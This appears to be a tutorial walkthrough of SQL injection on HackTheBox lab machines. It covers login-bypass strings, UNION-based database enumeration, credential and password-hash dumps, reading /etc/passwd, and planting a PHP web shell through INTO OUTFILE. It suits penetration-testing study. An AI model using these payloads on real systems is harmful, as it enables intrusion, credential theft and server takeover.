Sql Injection Methods Link to heading
How to identify SQL injection Link to heading
Refer below webpage( a smaple hotel reservation website) from the hackthebox machine.
I am going to add ’ and see if there are any erros.
Actual url
http://10.10.10.143/room.php?cod=1
SQL inection tested url
http://10.10.10.143/room.php?cod=1'
There are no errors and the page seems broken. This gives hint for SQL injection vulnarability.
Another example for detecting manual sql injection: Link to heading
Please find the blog post below
Try adding ’ at the end like previous example to see if any errors. There are no errors and the page even loads as well.
This could also lead a possibility of sql injection.
Using sqlmap for identifying sql injection Link to heading
Sqlmap command is also used to verify the sql injection. The above url has been tested with sqlmap as follows.
sqlmap -u http://10.10.10.143/room.php?cod=1
___
__H__
___ ___[,]_____ ___ ___ {1.5.5#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:44:14 /2022-04-18/
[19:44:14] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=pa8drq7eju8...fj50giiq54'). Do you want to use those [Y/n] y
[19:44:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:44:20] [INFO] testing if the target URL content is stable
[19:44:20] [INFO] target URL content is stable
[19:44:49] [INFO] GET parameter 'cod' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'cod' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
[19:45:12] [ERROR] user quit
Authentication bypass using sqlinjection Link to heading
Lets if there is username/password authentication page and the theory behind how the authentication works as follows:
select * from users where username = '[username]' and password = hash('[password]');
Once we type the username and password, it checks the database which it stores and allows the access.
If the site is vulnarable to sql injection, on username /password field we input some vaues like below which may help in bypassing these actual username/password checks
admin' or 1=1 limit 1;-- -
'or' '=' 'or'
The sql authentication bypass injection makes like this. Basically these type of queries are used if we dont know the username/password. Once we pass this query, the lookup like this:
select * from users where username = 'admin' or 1=1 limit 1;-- -' and password = [hash];
There are some similiar strings found [here ](SQL injection | OWASP Bricks Login page #1)for authentication bypass
Fuzzing Method Link to heading
In the above method we manually tried few sql injection techniques to bypass the login. The same be tried automatically with fuzzing tools so it can try a large worldslist of sql injection strings.For this we use the tool called Ffuf.
The command format used for ffuf as follows:
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -H "Content-Type: application/x-www-form-urlencoded"
each options are explained here:
-X POST ( post request)
-u http://10.10.11.101/administrative - ( url we want to fuzz)
-d ‘uname=FUZZ&password=testpassword’ - (FUZZ word we mentioned will be replaced with the wordlist we choose) `
-w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt ( wordlist)
-H “Content-Type: application/x-www-form-urlencoded” - default Content header format for login pages
Sample output
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -H "Content-Type: application/x-www-form-urlencoded" --fw 206
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://10.10.11.101/administrative
:: Wordlist : FUZZ: /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : uname=FUZZ&password=testpassword
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 206
________________________________________________
admin' or ' [Status: 200, Size: 1296, Words: 280, Lines: 33]
hi' or 'x'='x'; [Status: 200, Size: 1296, Words: 280, Lines: 33]
x' or 1=1 or 'x'='y [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 1=1 or ''=' [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 0=0 # [Status: 200, Size: 1296, Words: 280, Lines: 33]
Initially when i run the output looks messy. I want to filter the output so i have used the most common word length shown initailly which is 206. So I have added -fw=206 option in above output. Without this option you can refer the output which contain lot of unnecessary results.
If using proxy, you can add the proxy option as well like this
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -x http://127.0.0.1:8080 -H "Content-Type: application/x-www-form-urlencoded" --fw 206
Lets try to login with one of the results from FFUF results and i can see it works as well:
Link to heading
SQL query and true and false statement Link to heading
sql query is like a form like below. Each database will be having multipe table and each table will be having differnt collumns. Using the sql injection techniques we focuss on gettings the data from collums of each tables and databases.
Sql query format
SELECT col1,col2,col3... from table WHERE id=$_GET['cod'];
we add AND 1=1;– - which is always true. They query, assuming cod=1
The query will be
SELECT col1,col2,col3... from table WHERE id=$_GET['cod'] AND 1=1;-- -
The trailing – - effectively comments out further SQL commands. Typically – would suffice but the extra space at the end is ignored by browsers incase we didn’t use Burp in this case.
Lets try differnt combination. intially i tried below, its gives some results
http://10.10.10.143/room.php?cod=1%20AND%201=1;-- -
http://10.10.10.143/room.php?cod=1%20AND%201=2;-- -
http://10.10.10.143/room.php?cod=1%20AND%201=3;-- -
No errors. refer below
If you try below page it gave a blank page, but no errors.
These confirms there are some sql injections possible with this.
Union Injection Link to heading
1=1 condition is required only for testing of sql injection possibility.
To do Union Injection, we need to know the number of collumns. Remember we talked about sql query format
SELECT col1,col2,col3... from table WHERE id=$_GET['cod'];
In this case we need to find out the number of collumns involved in thid DB.
The below command gives a blank page.
http://10.10.10.143/room.php?cod=99 UNION SELECT 1;-- -
We can try adding more collums like this.
http://10.10.10.143/room.php?cod=99 UNION SELECT 1;-- -
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2;-- -
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2,3;-- -
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2,3,4;-- -
All these pages were giving blank page like this. This was due the number of collums should be wrong. The query gave some useful information untill it reached 7 collums.
http://10.10.10.143/room.php?cod=99 UNION SELECT 1,2,3,4,5,6,7;-- -
While comparing with actual picture we can say “5=picture, 2=room title, 3-room price,4=room description.”
Collumns 2 seems to more clearer one and we will be using collumns 2 for further enumeration using sql injection.
Union Injection another example: Link to heading
I am using one of this string ’ or 0=0 # to login to login page like below. Make sure to capture the request using the burp to see what is happeing in background:
burp capture
Let’s try union injection like we tried earlier example:
Union injection code to be modified via Burp(The reason why we add ’ with union injection values because the form needs to be logged in. Without ’ it will never logs in and data base table wont be looked in.)
' UNION select 1;-- -
I keep on adding the union injection values like ’ UNION select 1,2,3;– - No change in the response. No errors as welll, like previous example. It hints this page may be vulnarable to union sql injection.
When the union injection values reaches till ’ UNION select 1,2,3,4,5,6;– - we can see some results on the respose on burp. This proves the current database have 6 collums /tables and 2nd collums is the username which was previously showing the username. Now it has been replaced with number 2 which we specified on injection.
So now onwards we will use collumn 2 for injection and lets find the current database name:
uname=' UNION select 1,database(),3,4,5,6;-- -&password=test
To find all databases:
uname=' UNION select 1,schema_name,3,4,5,6 from information_schema.schemata;-- -&password=test
To put it in more readable format we can use groupconcat function like this
UNION select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata
How to read a system/server file using " load_file query"sql injection Link to heading
The query which can be used:
uname=' UNION select 1,load_file("/etc/lsb-release"),3,4,5,6;-- -&password=test
Group_concat method Link to heading
Group concat method can be used in sql queries to concat multiples values to be displayed on single array. There is good [sql injection queries cheatsheet ](MySQL SQL Injection Cheat Sheet | pentestmonkey)available from pentestmonkey.
Using the cheatsheet we can formulate the sql queries for exfiltration.
Finding the Database name: Link to heading
Actual query: “SELECT 1, group_concat(schema_name), 3, 4, 5, 6, 7 from information_schema.schemata;– -”
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7 from information_schema.schemata;-- -
Results
hotel,information_schema,mysql,performance_schema
Enumerating the tables from the database identified: Link to heading
Query: “UNION ALL SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema=‘Databasename’ ;– -”
Sample query to find the tables from database “hotel” in above url
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='hotel' ;-- -
Results:
Only one table found from database: hotel
room
Enumerating one more database to find the tables Link to heading
Here is the sample query to find the tables from one more database"mysql":
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='mysql' ;-- -
Ans:
column_stats,columns_priv,db,event,func,general_log,gtid_slave_pos,help_category,help_keyword,help_relation,help_topic,host,index_stats,innodb_index_st
Finding the collums from the table Link to heading
In above scenario we enumerated tables from 2 databases.
Database: hotel Tables: room
Database:mysql Tables: column_stats,columns_priv,db,event,func,general_log,gtid_slave_pos,help_category,help_keyword,help_relation,help_topic,host,index_stats,innodb_index_stats,innodb_table_stats,plugin,proc,procs_priv,proxies_priv,roles_mapping,servers,slow_log,table_stats,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user
Query: UNION ALL SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name=‘tablename’
Sample query to find the collumns of the table :room
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name='room';-- -
Ans:
cod,name,price,descrip,star,image,mini
One more query to find the collumns of table “user” from database “mysql”
Query: UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns WHERE table_schema=‘mysql’ and table_name=‘user’;– -
Sample query:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns WHERE table_schema='mysql' and table_name='user';-- -
Ans
Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,Re
Finding the values of each collumns Link to heading
We have identified mutiple intresting collumns like( host,user,password,select_priv) above by enumerating the sql.
Query for finding the values of each collumn: UNION ALL SELECT 1,group_concat(Collumn1,":",Collumn2,":",Collumn3,":",Collumn4),3,4,5,6,7 from mysql.user;–
Sample query to find the values of (host,user,password,privilege) , we have “:” to separate each values as it will be displaying on single row.
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,group_concat(Host,":",User,":",Password,":",File_priv),3,4,5,6,7 from mysql.user;--
Ans
localhost:DBadmin:****7D29964D0:y
We have exfiltrated the sensitive information like (host,user,db,priv) from the table"user" of database “mysql”
Like we use this on browser , sometime we have to use this intercepting the request via burp( same has shown in previous example). Refer the example again:
Exfiltration without using the group_concat function_ Link to heading
Since we know we identified that there are 7 collumns. We were using the group_concat function to get the required values in single array on collumn2. We chose the collumn 2 as it was visible more.
There is one more method without using the group_concat function which can be used if you are trying to find less number of collumns.
Query without group_concat: UNION ALL SELECT 1, collumn1,3, 4,Collumn2, 6, 7 from Databasenmae.Tablename;– -
Sample query (In this case i am going to exfiltrate only 2 collumns.)
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1, user,3, 4,password, 6, 7 from mysql.user;-- -
We can see the values of dbusername and dbpassword above.
To view the files Link to heading
Once we confirm the sql injection we can try the function “load_file” to view any system files like /etc/passwd
Query format: UNION ALL SELECT 1,load_file(“filepath”),3,4,5,6,7 from databasename.tablename;– -
Sample query to view the /etc/passwd in above case
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,load_file("/etc/passwd"),3,4,5,6,7 from mysql.user;-- -
One more example:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,load_file("/var/www/html/index.php"),3,4,5,6,7 from mysql.user;-- -
Incase if you want to enode and see the page use this query
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,TO_BASE64(LOAD_FILE("/var/www/html/index.php")),3,4,5,6,7 from mysql.user;-- -
Sqlmap Link to heading
sqlmap was used earlier to find out the url is vulnarable to sql injection or not. That’s not the only use of it. It can be used for enumeration to find the database deatils like we did in earlier example manually from browser or intercepting .
In this example , its a login page and use any username and password and intercept the request and save it in the local PC as file ( in this case it’saved as login.req)
Sqlmap to identify the sql injection Link to heading
sqlmap -r login.req
___
__H__
___ ___["]_____ ___ ___ {1.5.5#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:42:47 /2022-06-25/
[21:42:47] [INFO] parsing HTTP request from 'login.req'
[21:42:47] [INFO] resuming back-end DBMS 'mysql'
[21:42:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[21:42:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
In the above query sql injection possibility using the union query is suggested.
Finding the databases using the sqlmap Link to heading
In the above example, it shared union sql injection possibility. With the below query we can enumerate the databases names
sqlmap -r login.req --dbs
___
__H__
___ ___[']_____ ___ ___ {1.5.5#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:45:14 /2022-06-25/
[21:45:14] [INFO] parsing HTTP request from 'login.req'
[21:45:14] [INFO] resuming back-end DBMS 'mysql'
[21:45:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[21:45:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:45:15] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] writer
[21:45:16] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
We have got 2 databases names.
Sqlmap to identify the tables in a database Link to heading
Lets enumerate to find the table name of database “writer” in above example
sqlmap -r login.req -D writer --tables
___
__H__
___ ___["]_____ ___ ___ {1.5.5#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:48:44 /2022-06-25/
[21:48:44] [INFO] parsing HTTP request from 'login.req'
[21:48:44] [INFO] resuming back-end DBMS 'mysql'
[21:48:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[21:48:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:48:45] [INFO] fetching tables for database: 'writer'
Database: writer
[3 tables]
+---------+
| site |
| stories |
| users |
+---------+
[21:48:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
Sqlmap to dump the contents of specific table in a database Link to heading
In this example we try to dump the data of the table “users” from database “writer”. Please note that some time these values may be large.
sqlmap -r login.req -D writer -T users --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.5#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:51:32 /2022-06-25/
[21:51:32] [INFO] parsing HTTP request from 'login.req'
[21:51:32] [INFO] resuming back-end DBMS 'mysql'
[21:51:32] [INFO] testing connection to the target URL
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email | status | password | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1 | adm***@writer.htb | Active | 118e4879463********* | admin | NULL |
+----+------------------+--------+----------------------------------+----------+--------------+
[21:51:45] [INFO] table 'writer.users' dumped to CSV file '/home/rocky/.local/share/sqlmap/output/10.10.11.101/dump/writer/users.csv'
[21:51:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
We got some username and password hashes. The password hash can be tried to be cracked by comparing the wordlist with tools like hashcat or john.
View/read files using the sqlmap Link to heading
In above example you can notice even it displays the database details, it download these information and stores it local PC
Review outputs carefully you can see below sections:
[21:48:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101
using sqlmap we can download the remote file so we can view them:
sqlmap -r login.req --file-read=/etc/lsb-release
___
__H__
___ ___["]_____ ___ ___ {1.5.5#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_lsb-release (same file)
[05:32:11] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
cat /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_lsb-release 1 ⨯
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"
sqlmap -r login.req --file-read=/etc/passwd
___
__H__
___ ___[,]_____ ___ ___ {1.5.5#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liabi
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd (same file)
[05:42:55] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
cat /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
postfix:x:113:118::/var/spool/postfix:/usr/sbin/nologin
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
Write a file using OUTFILE function Link to heading
Lets use outfile function to create a new file. Lets use a simple test file initially.
Query
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,'testing',3,4,5,6,7 INTO OUTFILE '/var/www/html/test.txt';-- -
Result
Now lets upload a command shell
Query format:
http://10.10.10.143/room.php?cod=99 UNION ALL SELECT 1,'<?php echo system($_REQUEST ["cmd"]); ?>',3,4,5,6,7 INTO OUTFILE '/var/www/html/cmd.php';-- -
Results
Access http://10.10.10.143/cmd.php?cmd=id
Reverse shell Link to heading
In the above section we have uploaded web command shell and tested the commands. Lets use the same shell and use the burp to pass the command for netcat reverse shell.
Query : http://10.10.10.143/cmd.php?cmd=id
Now edit the Burp request and add netcat reverse shell command and make sure to encode it as follows
We have a reverse shell now.
